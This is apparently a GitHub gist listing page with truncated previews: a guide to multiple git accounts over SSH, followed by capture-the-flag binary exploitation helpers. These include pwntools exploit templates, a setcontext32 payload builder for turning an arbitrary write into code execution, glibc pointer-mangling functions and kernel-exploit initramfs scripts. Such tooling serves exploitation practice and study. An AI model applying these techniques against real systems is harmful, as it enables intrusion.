
@k4lizen
k4lizen / multiple_git.md
Last active November 28, 2024 15:44
How to manage multiple git accounts with SSH

How to manage multiple git accounts (with SSH)

Guide for Windows; it should apply similarly elsewhere. We will use SSH. If you only care about GitHub, check these out: cli/cli#326 & https://github.com/cli/cli/releases/tag/v2.40.0.

The git side

When making a commit, the username and email tagged with the commit are the ones specified in git config user.name and git config user.email. For GitHub at least (but probably for every other hosting service as well), your email is used as your identifier: it connects you, as the commit author, to your profile on the hosting service.

I like to keep my email private, so the email I connect my commits to GitHub projects with is the noreply one provided by GitHub. It can be found in GitHub -> Settings -> Emails and looks like [email protected], with the number at the beginning being essentially the only important part. If you change the name after the +, GitHub will still recognize it as you, as long as the numbers ar

@k4lizen
k4lizen / lexploit.py
Last active March 31, 2024 13:54
Binary Exploitation template with custom LIBC
#!/usr/bin/env python
from pwn import *
def start():
    if args.GDB or args.DBG:
        return gdb.debug([ld.path, elff.path], gdbinit, aslr=using_aslr, env={"LD_PRELOAD": libc.path})
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2])
    return process([ld.path, elff.path], aslr=using_aslr, env={"LD_PRELOAD": libc.path})
@k4lizen
k4lizen / exploit.py
Last active July 20, 2024 07:26
Binary Exploitation template
#!/usr/bin/env python
from pwn import *
HOST = "example.com"
PORT = 1337
using_aslr = False
exe = context.binary = ELF('./chal', checksec=False)
# libc = ELF('./libc.so.6', checksec=False)
# ld = ELF('./ld-linux-x86-64.so.2', checksec=False)
@k4lizen
k4lizen / libc-from-dockerfile.sh
Created March 15, 2024 17:27
Get LIBC and interpreter from Dockerfile
#!/bin/sh
# dependencies: docker and https://github.com/BurntSushi/ripgrep
libc_renamed=libc.so.6
ldlinux_renamed=ld-linux.so
if distro=$(rg -or '$1$2' -- '(?:--from=|FROM )(debian|ubuntu)(\S+)?' Dockerfile); then
  if container=$(docker container create "$distro"); then
    if libs=$(docker run "$distro" ldd /bin/true); then
      libs=$(printf %s "$libs" | awk 'NF == 4 {print $3}; NF == 2 {print $1}')
      for lib in $libs; do
        case $lib in
@k4lizen
k4lizen / elf.py
Created April 12, 2024 01:15
elf.py script for elfcrafting
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# mayhem/datatypes/elf.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
@k4lizen
k4lizen / setcontext32.py
Last active April 13, 2024 02:59
setcontext32 payload to turn arbitrary write to RCE
# from https://hackmd.io/@pepsipu/SyqPbk94a
from pwn import *
def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
@k4lizen
k4lizen / libc_call.py
Created April 21, 2024 12:23
Using libc (rand, srand, etc.) from Python
import time
from ctypes import CDLL
from math import floor
libc = CDLL("libc.so.6")
# seed with the current epoch second, the same way a C program doing srand(time(NULL)) would
now = int(floor(time.time()))
libc.srand(now)
print(libc.rand())
@k4lizen
k4lizen / ptrmangle.py
Last active May 3, 2024 17:29
glibc pointer (de)mangling
# for exit funcs
def shift_right_carry(number: int, shift_amount: int) -> int:
    # rotate a 64-bit value right by shift_amount, carrying the low bit into bit 63
    for i in range(shift_amount):
        if (number & 1) == 0:
            number = number >> 1
        else:
            number = (number >> 1) | 0x8000000000000000
    return number
def shift_left_carry(number: int, shift_amount: int) -> int:
    # inverse of shift_right_carry: rotate a 64-bit value left, carrying bit 63 into bit 0
    for i in range(shift_amount):
        carry = (number >> 63) & 1
        number = ((number << 1) & 0xFFFFFFFFFFFFFFFF) | carry
    return number
@k4lizen
k4lizen / decompress.sh
Last active July 12, 2024 15:07
kernel pwn: Decompress a .cpio.gz file system (initramfs)
#!/bin/bash
# Decompress a .cpio.gz packed file system into ./initramfs
set -e
rm -rf ./initramfs
mkdir initramfs
cd initramfs
cp ../initramfs.cpio.gz .
gunzip ./initramfs.cpio.gz
cpio -idm < ./initramfs.cpio
rm initramfs.cpio
echo "Done"
@k4lizen
k4lizen / compress.sh
Last active July 12, 2024 14:42
kernel pwn: Compress initramfs with statically linked exploit
#!/bin/bash
# Compress initramfs with the included statically linked exploit
# usage: ./compress.sh exploit.c
in=$1
out=${in%.c}   # strip the trailing ".c" to get the binary name
gcc "$in" -static -o "$out" || exit 255
mv "$out" initramfs
pushd initramfs > /dev/null || exit 1
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd > /dev/null